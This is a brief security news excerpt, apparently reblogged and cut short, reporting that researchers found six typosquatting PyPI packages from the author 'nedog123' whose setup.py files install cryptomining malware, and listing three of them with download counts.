Researchers uncovered six malicious typosquatting packages in the official Python programming language’s PyPI repository, laced with cryptomining malware.
Python Package Index or PyPI is a software code repository created in Python language. Like other repositories such as npm, GitHub, and RubyGems, PyPI is a part of the software supply chain. It offers a place where coders can upload software packages that developers use while building different applications and services.
The fake packages had been submitted by a single author using the ID “nedog123,” and some of them date as far back as April 2021. The packages contained instructions in the setup.py files that download and install cryptomining malware onto systems after getting installed.
A single malicious package can be used in multiple projects, infect the device with cryptominers or info-stealers, etc., thus, making the remediation process extremely difficult.
Malicious Packages Details
- maratlib: 2,371 downloads
- maratlib1: 379 downloads
- matplatlib-plus: 913 downloads
View original post 63 more words